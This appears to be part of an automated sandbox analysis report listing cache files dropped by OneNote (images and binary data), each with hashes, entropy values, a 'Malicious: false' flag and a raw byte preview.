Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r\|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m\|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B\|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.473110142834424
Encrypted:	false
SSDEEP:	48:ys3/jY1a9XttUEP3F7vXS9PqdtjcTrdHr76tXBzI/MBn:ysc1aJtWEP3FzXS9PitjqRLOCM
MD5:	599880C6A75F6F8561F171FB8C730EDD
SHA1:	E8D8411FA8AF5B88BB37831385F4529B218D7389
SHA-256:	2D6D91E54E35F8D4BAFBB7AE0D0A04793D428AFE6F0E5161235DAAE56300DA7A
SHA-512:	0BED6945A0FA571FC38CE87C8CBD421373D661A735602D18C229ED43B58F0B9B4304239AC41A331BEBBDD5C4C7D912424AF75445E1B0C670BA89D84E67636EEC
Malicious:	false
Preview:	2...>.......p...v...d.....................................................?....?........................................................................2...>...L.......v................................I.......I.qk..B.....LZ]......].}..`..W`.'...].}..`..W`.'...]...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Hyf..BQ.$F.UZ.......N...^...............;..s./.E...>.. ........Z................................... ....I.qk..B.....LZ............Hyf..BQ.$F.UZ...........Hyf..BQ.$F.UZ............]......]......]..........................................].j....].T%c..]......]...G..]...H..]...>..]......]. .3...................;........4...4...4.."..............]..]..]...z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........]......].....#].............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	7.384274251000273
Encrypted:	false
SSDEEP:	48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
MD5:	09A7AE94AA8E517298A9618A13D6E0E2
SHA1:	FA5181A7414BA32F816BF0C4278EC20C615E8B1A
SHA-256:	3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
SHA-512:	074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.\|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.\|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)..TT...."....T.Tc.j..............j.z!.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._.._C.k..p9.p..O..vu...'........0v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
Category:	dropped
Size (bytes):	784
Entropy (8bit):	6.962539208465222
Encrypted:	false
SSDEEP:	12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
MD5:	14105A831FE32590E52C2E2E41879624
SHA1:	078FA63FC7DB5830E9059DF02D56882240429D90
SHA-256:	D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
SHA-512:	8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`...C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%\|.f.~.......:y....S....UKovh...W'........lF... .................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.7352901783761467
Encrypted:	false
SSDEEP:	96:1sBh92K+SVkBLQoWE5vXj9Fim3hRQ5BTN5i:1sBz2K+ZZQQ5vXj94m3hRCBT
MD5:	489FA02A50CE0167632419D15613B5A2
SHA1:	4F625EAD0462D8CF51CB30142920FEE934CDE020
SHA-256:	D33F8FAAB08E93661C0132735181C7959C504E0487A8B33D79E05C2F47BB6B36
SHA-512:	4F0380F436AB0497242ECDE6371AE5E89DF15E2273D47245AAFDBE9131121C792868C7D22CBA29D14A3DB8FE0E4EFAB5C1374D4A512EDFC3D79EF133CDDD58E7
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...........v................................I.......I.qk..B.....LZj.Y.....j.Y{.&..$>......j.Y{.&..$>......j.Y..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................&U<.6..N~.......N...^.....................C.K.1.."T............................................^....I.qk..B.....LZ................&U<.6..N~...............&U<.6..N~............j.Y.....j.Y.....j.Y.........................................j.Yj....j.YT.l..j.Y.....j.Y..Q..j.Y..Q..j.Y..>..j.Y.....j.Y .3...................;........4...4...4.."..............j.Y.j.Y.j.Y..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........j.Y.....j.Y....#j.Y............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
Category:	dropped
Size (bytes):	3009
Entropy (8bit):	7.493528353751471
Encrypted:	false
SSDEEP:	48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
MD5:	D9BD80D40B458EDB2A318F639561579A
SHA1:	83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
SHA-256:	509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
SHA-512:	C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''*''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .te..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N..............#..M<\|.2.Y.../QO.x.cTM4......+.F;V.x.de....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........\|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.563021222358941
Encrypted:	false
SSDEEP:	24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
MD5:	DB8A181E3F0EAD4A9472099E42ED6BE3
SHA1:	92096AF05CC6167B1AA816811A1160B809393FA2
SHA-256:	E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
SHA-512:	A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......\|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~\|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.\|.....5h.y.%.~...G

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.326597027699643
Encrypted:	false
SSDEEP:	48:YuuRsPPH0+ritzSvEgLX9iIG9e46oxrdQqr2q6BXGCh4ch:YPRs30+ri9cEaXY9eDgRQyUo8
MD5:	F8832D22E349C449BC4619700A3C6707
SHA1:	545F791692FEED7D15D393EFE12A1028003BCCE9
SHA-256:	A269DF863BBBECC1F22BD919DB18F3E5C504C0F1368D581B045371B075EDBCA9
SHA-512:	85EA71E8DA499AA97BEC5EF0917D9B7C03B8DF1F5046B7DD9C32C808E1ACF6364B427CBB762A23219EE3084DCFE325C40C9158D031AD56EF0A9A8BDB9CB4D0DF
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.P.......P...P.3.Z?..8.P...P.3.Z?..8.P...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............:@.MW.......Vj&....N...^...............[z.A..1N..............f........................................I.qk..B.....LZ.............:@.MW.......Vj&.........:@.MW.......Vj&..........P.......P.......P...........................................P.j.....P.T.]...P.......P...B...P.H.....P...B...P...>.).P...J...................;........4...4...4.."...............P...P...P...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........P.......P.....#.P.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	99293
Entropy (8bit):	7.9690121496708555
Encrypted:	false
SSDEEP:	1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
MD5:	EA45266A770EEA27A24A5BB3BE688B14
SHA1:	9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
SHA-256:	EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
SHA-512:	D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
Malicious:	false
Preview:	.PNG........IHDR...-...c............sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.\|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R...<........6...m@..r..j2..HK"\|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n.........#..W.41...5.#.`..I...<.?.\|..+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.366296146543238
Encrypted:	false
SSDEEP:	96:YXRsD7ClKrIWEP/Xg9+DARQy8ZfGsl+x5KE0/Ggil:KRsD7ClKrcP/Xg9+DARJ8ZfGsl+x5KE5
MD5:	4FF13DC0C9E9FB271219D10452B0537A
SHA1:	5238686A94DE9F944514E103136ED7C3468ABA04
SHA-256:	E971D59C5011983BB02FA31717F6329F7C94589FEA49C3F3669B77DE0651F0DF
SHA-512:	E0B82742F14F36AF43315941138625C29DC990D6AE50F22B2E51A514194DB8EA883EBC50EE298BC01622A71F9F74AC2365671376BFB5ABDA40B697ADB6171F9C
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZk......k..&..m.:..k..&..m.:..k...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................8..>2.....,....N...^.................4.j..N.H*E..g.........f........................................I.qk..B.....LZ...............8..>2.....,...........8..>2.....,.........k......k......k..........................................k.j....k.T.]..k......k...B..k.H....k...B..k...>.)k...J...................;........4...4...4.."..............k..k..k...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........k......k.....#k.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
Category:	dropped
Size (bytes):	2898
Entropy (8bit):	7.551512280854713
Encrypted:	false
SSDEEP:	48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
MD5:	7C7D9922101488124D2E4666709198AC
SHA1:	00CC44A1B84D4D94A0ACE8834491EB5F65D04619
SHA-256:	20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
SHA-512:	882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................\| F.. ...j...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.313711359385232
Encrypted:	false
SSDEEP:	48:usyfT8A2O4t/8ESh7xTWXa5TW9I18ocSrdQqrRW3Dig2BXMbMpvJZDZMYl4Lbg:ushO4WEShdWXapW9TtSRQyRiiHRl4
MD5:	EA9E0CF0A261F01EF636D22B452A73A2
SHA1:	01E961535DA1ACEC4BF9AEA9E6953830F05D1B98
SHA-256:	C1C8A659541C9A63A602999C354F60D860F0B41334B7A7D76BCFE19217B7469D
SHA-512:	7C140D4C0DAD7803C5E06EA77F19F344D65997F870BFD331BCE1ECA72E63F545012F80EF519D2BA2C952DD8B2333397EE429A59B5977A91F99C02DF10AB4FA97
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.z.......z.)..b..jK.....z.)..b..jK.....z...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................A.........7.....N...^................2...U.E.nG..! .........f........................................I.qk..B.....LZ................A.........7.............A.........7...........z.......z.......z...........................................z.j.....z.T.]...z.......z..B...z.H.....z...B...z...>.).z...J...................;........4...4...4.."...............z...z...z...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........z.......z.....#.z.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
Category:	dropped
Size (bytes):	29187
Entropy (8bit):	7.971308326749753
Encrypted:	false
SSDEEP:	768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
MD5:	DF99CAAAB9A7DE97B63343E60A699AB6
SHA1:	B84334135CFB73BC6EF55F85926770D5AC6DFEA8
SHA-256:	74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
SHA-512:	5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;.'.f.5^.....m..<$....8.R.j.D.v..>...dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%..S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..\|D...+...NA....Y.^f.1\|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N......U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.616219113007859
Encrypted:	false
SSDEEP:	96:XzIs2hx+elEYY6OXxa9kgRQymhSmYdBskPmnB1:XzIs2h7yxdXxa9kgRJmhSmYdBskPmB1
MD5:	611B2E6204DDD156818F6B71DDA56964
SHA1:	32744FEACFF4596D30AF58289FB42089A39B4B75
SHA-256:	B208BF3B4603F3817E0CB682857FEE6AE8E900702BD5B4943E8F32893E871EC8
SHA-512:	724011DDC49A52B9CD5544CED301696DA0DC534804017CACFFC6A7A1057C5EAB644571E8E97E0E0D2FF9039AC2D79D034C0808950A119D71A2A998B1BFFD27E1
Malicious:	false
Preview:	:...F...,.......V.......................................................................................................................................:...F...j.......V................................I.qk..B.....LZ............`....r..S...%l.........`....r..S...%l.....:...F...........V.............................I.......I...................................................I.t.....I................................................................4..'...'.....................................................................~................................................................................................I.qk..B.....LZ..............T.......T.......T...........................................T.j.....T.T.]...T.......T...B...T.H.....T...B...T...>.).T...J...................;........4...4...4.."...............T...T...T...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........T.......T.....#.T.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	7.874649683222419
Encrypted:	false
SSDEEP:	96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
MD5:	5D6C1F361BC04403555BE945E28E53FC
SHA1:	00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
SHA-256:	131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
SHA-512:	34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V...S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.\|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.500015609543053
Encrypted:	false
SSDEEP:	24:+m5yekzJmI2Z7VydNDpqUlxIx7gUlX6FlmmecUlSkl2VFwqcPUli60QX/qo1UlK5:+YEznpdN9lGtplEsmsl/awklB0tBlW
MD5:	AB91EDE5C316A03E39C495DA0C427C3A
SHA1:	C98255A42CD01564F8AC930607315F4A6755C0A4
SHA-256:	6695AF57A69248C9811D84A68FEE1DC299432FEF368BE12D1621C3F961D97DD5
SHA-512:	DDBCDB7695548EABAD40915FF123D953FFA0CEF42327D3901836F23826E6EA26286F6CEF8EDA8BFFB1A803A5AF3BBB2FD45FC1D81DBF5F01B59BF0ECFBE23FDB
Malicious:	false
Preview:	......................................?...................................................................................................................................................................}.......}n~H..&..e..[...........B...K.#9.'.. .+.-....5...M.SN.+..........6...x........W...'.1om.@...............................................................................j.....`....x....7..x....Q..x....Y..x....a..x....n....................4..~...1...(...(.......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.T.e.m.p.l.a.t.e.s.\.1.0.3.3.\.O.N.E.N.O.T.E.\.1.6.\.S.t.a.t.i.o.n.e.r.y.......S.t.a.t.i.o.n.e.r.y.............1.......S.t.a.t.i.o.n.e.r.y............x....1... ..$....S.t.a.t.i.o.n.e.r.y........>.......>.l3....c...wjq...........W...'.1om.@.2...........R.................................................................c..,............................c..,0.................C@...B.+................x...x....1... ..$....S.t.a.t.i.o.n.e.r.y...........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000030.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.6356297934929773
Encrypted:	false
SSDEEP:	12:g6LKu6l/GOwrdgaqfJfVtVTwMJKl/ilCgJilmxil6togul/UazVAkY9RHQWZQNql:HLUlONQtxzogBDoJl8az2rsVNXwumV8
MD5:	9AE96A675834A8EF46F32233A89EE21A
SHA1:	F22D0C33A80FE79C642C9041861C82018EFA34B1
SHA-256:	1621F39C95F58512F878579AE14893DCF3B4C2D2D2CF793485FAC078225F3DCA
SHA-512:	26567D29FB993F14970F59855C54F7059F616F79D110FA9EEA9FA42165D05FFCEFBC8809AEC2CF3A2D6FA37A0DE5394DE27647336E120203C218BFE7E4F045F2
Malicious:	false
Preview:	......................................................................................................................................................../<@...../<@XY..F.:..[.&............I.X.L..}.].-..........{7.N...K..r&.2.....&.2H=..B.j5... .Y.;....@..S....Y.;.&.2H=..B.j5... .&.2....I.X.L..}.].-..............Y.;.....Y.;.................................................&.2N.2..Y.;..(..Y.;`......................................................4..~...1...(...(...h...C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.T.e.m.p.l.a.t.e.s.......T.e.m.p.l.a.t.e.s...............1.......T.e.m.p.l.a.t.e.s..............&.2..1... ..$....T.e.m.p.l.a.t.e.s.........Y.;.....Y.;....@..S...............I.X.L..}.].-.2.......&.......................&.2.Y.;.......................................c..,....................G..2.).......N...^................!.....I.F...................................................................................!.....I.F..................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000031.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7327493822047978
Encrypted:	false
SSDEEP:	12:DaCmUfg2tZDXDwVhEiDwVeEWDwVhaagqQEgFagS:ODeg2MVh6VeEpVcagqUFag
MD5:	09D72339D8696B89D15395FB18920692
SHA1:	DC1F2EB28B7833AE443472BC9FC1EC1115C25D77
SHA-256:	D7528EFB8428DE39D73289D56B82640B5C62BA83B06C9CBC1F7C92149670DD48
SHA-512:	70F5049F57CB8BC797247AAD432CC7BB33AA9D0AA6434A251E0CADA4BEA4B5275176F898A9F7B88FDE1D8CE887FD349881FECAD56F1DFB7258A38B84FB698448
Malicious:	false
